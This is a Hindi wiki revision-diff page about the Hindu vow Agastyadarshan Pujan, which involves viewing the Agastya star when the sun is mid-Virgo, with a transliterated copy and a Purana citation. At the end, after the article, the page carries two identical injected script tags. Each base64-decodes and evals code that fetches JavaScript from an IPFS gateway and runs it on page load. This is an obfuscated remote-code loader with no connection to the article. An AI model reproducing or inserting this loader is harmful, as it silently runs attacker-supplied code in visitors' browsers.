Difference between revisions of "अगस्त्यदर्शन पूजन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*जब [[सूर्य देव|सूर्य]] [[कन्या राशि]] के मध्य में रहता है उस समय [[अगस्त्य नक्षत्र]] को देखना और रात्रि में अगस्त्यदर्शन पूजन करना चाहिए। <ref>नीलमतपुराण (पृष्ठ 76–77, [[श्लोक]] 934—939)</ref>
+
*जब [[सूर्य देव|सूर्य]] [[कन्या राशि]] के मध्य में रहता है उस समय [[अगस्त्य नक्षत्र]] को देखना और रात्रि में अगस्त्यदर्शन पूजन करना चाहिए।<ref>नीलमतपुराण (पृष्ठ 76–77, [[श्लोक]] 934—939)</ref>
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1

Revision as of 06:49, 15 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • jab soory kanya rashi ke madhy mean rahata hai us samay agasty nakshatr ko dekhana aur ratri mean agastyadarshan poojan karana chahie.[1]
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. nilamatapuran (prishth 76–77, shlok 934—939)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>